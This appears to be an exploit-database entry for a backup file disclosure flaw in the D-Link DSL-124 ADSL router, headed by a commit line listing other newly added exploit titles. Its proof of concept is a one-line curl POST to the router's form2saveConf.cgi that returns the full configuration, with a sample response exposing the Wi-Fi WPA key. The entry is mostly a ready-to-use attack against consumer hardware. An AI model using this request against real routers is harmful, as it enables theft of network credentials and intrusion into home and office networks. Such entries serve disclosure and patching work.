564d2ddf47
13 changes to exploits/shellcodes/ghdb DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS) Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS) Helmet Store Showroom v1.0 - SQL Injection Human Resource Management System 1.0 - SQL Injection (unauthenticated) Revenue Collection System v1.0 - Remote Code Execution (RCE) WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated) Outline V1.6.0 - Unquoted Service Path Inbit Messenger v4.9.0 - Unauthenticated Remote Command Execution (RCE) Inbit Messenger v4.9.0 - Unauthenticated Remote SEH Overflow Internet Download Manager v6.41 Build 3 - Remote Code Execution (RCE)
46 lines
No EOL
1.7 KiB
Text
46 lines
No EOL
1.7 KiB
Text
# Exploit Title: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure
|
|
# Date: 2022-11-10
|
|
# Exploit Author: Aryan Chehreghani
|
|
# Vendor Homepage: https://www.dlink.com
|
|
# Software Link: https://dlinkmea.com/index.php/product/details?det=dU1iNFc4cWRsdUpjWEpETFlSeFlZdz09
|
|
# Firmware Version: ME_1.00
|
|
# Tested on: Windows 11
|
|
|
|
# [ Details - DSL-124 ]:
|
|
#The DSL-124 Wireless N300 ADSL2+ Modem Router is a versatile, high-performance router for a home or small office,
|
|
#With integrated ADSL2/2+, supporting download speeds up to 24 Mbps, firewall protection,
|
|
#Quality of Service (QoS),802.11n wireless LAN, and four Ethernet switch ports,
|
|
#the Wireless N300 ADSL2+ Modem Router provides all the functions that a user needs to establish a secure and high-speed link to the Internet.
|
|
|
|
# [ Description ]:
|
|
#After the administrator enters and a new session is created, the attacker sends a request using the post method in her system,
|
|
#and in response to sending this request, she receives a complete backup of the router settings,
|
|
#In fact this happens because of the lack of management of users and sessions in the network.
|
|
|
|
# [ POC ]:
|
|
|
|
Request :
|
|
|
|
curl -d "submit.htm?saveconf.htm=Back+Settings" -X POST http://192.168.1.1/form2saveConf.cgi
|
|
|
|
Response :
|
|
|
|
HTTP/1.1 200 OK
|
|
Connection: close
|
|
Server: Virtual Web 0.9
|
|
Content-Type: application/octet-stream;
|
|
Content-Disposition: attachment;filename="config.img"
|
|
Pragma: no-cache
|
|
Cache-Control: no-cache
|
|
|
|
<Config_Information_File_8671>
|
|
<V N="WLAN_WPA_PSK" V="pass@12345"/>
|
|
<V N="WLAN_WPA_PSK_FORMAT" V="0x0"/>
|
|
<V N="WLAN_WPA_REKEY_TIME" V=""/>
|
|
<V N="WLAN_ENABLE_1X" V="0x0"/>
|
|
<V N="WLAN_ENABLE_MAC_AUTH" V="0x0"/>
|
|
<V N="WLAN_RS_IP" V="0.0.0.0"/>
|
|
.
|
|
.
|
|
.
|
|
</Config_Information_File_8671> |